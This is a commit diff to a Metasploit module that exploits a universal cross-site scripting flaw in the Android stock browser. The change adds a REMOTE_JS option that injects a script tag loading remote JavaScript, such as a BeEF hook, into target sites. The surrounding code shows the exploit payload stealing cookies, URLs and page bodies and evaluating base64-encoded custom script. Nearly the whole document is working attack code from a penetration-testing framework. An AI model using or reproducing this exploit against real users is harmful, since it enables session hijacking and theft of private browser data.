Add a REMOTE_JS datastore option for BeEf hooks etc.

2014-09-16 13:31:03 -05:00 · 2014-09-16 13:31:03 -05:00 · 59dfa624c4
parent 3e09283ce5
commit 59dfa624c4
1 changed files with 19 additions and 1 deletions
--- a/modules/auxiliary/gather/android_stock_browser_uxss.rb
+++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb
@ -57,6 +57,11 @@ class Metasploit3 < Msf::Auxiliary
        "A string of javascript to execute in the context of the target URLs.",
        ''
      ]),
+      OptString.new('REMOTE_JS', [
+        false,
+        "A URL to inject into a script tag in the context of the target URLs.",
+        ''
+      ]),
      OptBool.new('BYPASS_XFO', [
        false,
        "Bypass URLs that have X-Frame-Options by using a one-click popup exploit.",
@ -123,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary
          var exploit = function(){
            window.open('\\u0000javascript:if(document&&document.body){(opener||top).postMessage('+
              'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+
-              'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(datastore['CUSTOM_JS'])}"'+
+              'TML,i:'+(i||0)+'}),"*");eval(atob("#{Rex::Text.encode_base64(custom_js)}"'+
              '));}void(0);', n);
          }
          if (!n) {
@ -215,6 +220,19 @@ class Metasploit3 < Msf::Auxiliary
    "#{proto}://#{myhost}#{port_str}/#{datastore['URIPATH']}/catch"
  end

+  def custom_js
+    rjs_hook + datastore['CUSTOM_JS']
+  end
+
+  def rjs_hook
+    remote_js = datastore['REMOTE_JS']
+    if remote_js.present?
+      "var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); "
+    else
+      ''
+    end
+  end
+
  def run
    exploit
  end